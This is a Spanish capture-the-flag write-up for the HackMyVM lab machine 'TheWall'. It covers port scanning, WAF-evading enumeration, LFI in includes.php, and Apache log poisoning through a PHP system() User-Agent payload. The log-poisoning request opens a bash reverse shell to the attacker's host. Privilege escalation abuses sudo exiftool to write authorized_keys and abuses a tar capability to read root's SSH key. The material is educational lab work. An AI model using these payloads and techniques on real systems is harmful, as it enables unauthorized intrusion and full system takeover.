cd ~/blog

~/writeups/hmv/064-thewall.md

064 - TheWall

easy Linux hmv 07-04-2024
WAF bypassLFI + log poisoning (RCE)sudo exiftool file write (authorized_keys)Linux Capabilities Privesc (tar cap_dac_read_search)
hackmyvm.eu/machines/machine.php?vm=TheWall

~1 min de lectura


Comenzamos con la enumeración de puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.32
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.32
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-07 17:56 -04
Nmap scan report for 192.168.1.32
Host is up (0.00029s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 89:60:29:db:68:6d:13:34:98:b9:d0:17:24:56:a8:9e (RSA)
|   256 66:58:51:6d:cd:3a:67:46:36:56:9a:31:a0:08:13:cf (ECDSA)
|_  256 f7:34:9e:53:68:ba:c2:06:ab:14:c3:21:90:2d:6e:64 (ED25519)
80/tcp open  http    Apache httpd 2.4.54 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.54 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.97 seconds

Detectamos un WAF que bloquea las conexiones tras un tiempo, así que enumeramos con gobuster a baja velocidad (delay y un solo hilo):

 whatwaf -u http://192.168.1.32
...
[22:27:43][FIREWALL] detected website protection identified as 'Apache Generic'
...

 gobuster dir -u 'http://192.168.1.32' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php --delay 1s -t 2
...
/index.php
/includes.php         (Status: 200) [Size: 2]
...

/includes.php no está protegido por el WAF, así que fuzzeamos sus parámetros en busca de LFI y damos con display_page:

 ffuf -u 'http://192.168.1.32/includes.php?FUZZ=../../../../etc/passwd' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt --fw 1
...
display_page            [Status: 200, Size: 1460, Words: 15, Lines: 29, Duration: 101ms]
...

 curl 'http://192.168.1.32/includes.php?display_page=/etc/passwd' | grep home
john:x:1000:1000:,,,:/home/john:/bin/bash

Localizamos el log de Apache y hacemos log poisoning inyectando PHP en el User-Agent:

 ffuf -u 'http://192.168.1.32/includes.php?display_page=FUZZ' -w ~/Documentos/wordlists/LFI_payloads.txt --fw 1
...
/var/log/apache2/access.log [Status: 200, Size: 51854043, ...]
...
GET /includes.php?display_page=/var/log/apache2/access.log&0=bash+-c+"bash+-i+>%26+/dev/tcp/192.168.1.10/1234+0>%261" HTTP/1.1
User-Agent: <?php system($_GET[0]); ?>

Ya como www-data, revisamos sudo -l:

www-data@TheWall:/home/john$ sudo -l
Matching Defaults entries for www-data on TheWall:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on TheWall:
    (john : john) NOPASSWD: /usr/bin/exiftool

exiftool como john permite escribir archivos (con -filename). Generamos una clave SSH y usamos exiftool para colocar nuestro authorized_keys en el home de john:

 ssh-keygen -t rsa
...
www-data@TheWall:/tmp$ echo 'ssh-rsa ... > authorized_keys

www-data@TheWall:/tmp$ sudo -u john exiftool -filename=/home/john/.ssh/authorized_keys authorized_keys
Warning: Error removing old file - authorized_keys
    1 image files updated

❯ ssh john@192.168.1.32 -i id_rsa
john@TheWall:~$

Obtenemos la primera flag. Para escalar, listamos las capabilities (Linux Capabilities Privesc):

john@TheWall:~$ /usr/sbin/getcap -r / 2>/dev/null
...
/usr/sbin/tar cap_dac_read_search=ep
...

En la raíz hay una id_rsa de root. tar con cap_dac_read_search permite leer cualquier archivo saltándose los permisos, así que comprimimos la clave de root y la extraemos:

john@TheWall:~$ /usr/sbin/tar -czf id_rsa.tar.gz /id_rsa
/usr/sbin/tar: Removing leading `/' from member names

john@TheWall:~$ tar -xvf id_rsa.tar.gz
john@TheWall:~$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
...
-----END OPENSSH PRIVATE KEY-----

La copiamos a nuestra máquina y nos conectamos como root:

 ssh root@192.168.1.32 -i id_rsa_root
root@TheWall:~#

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados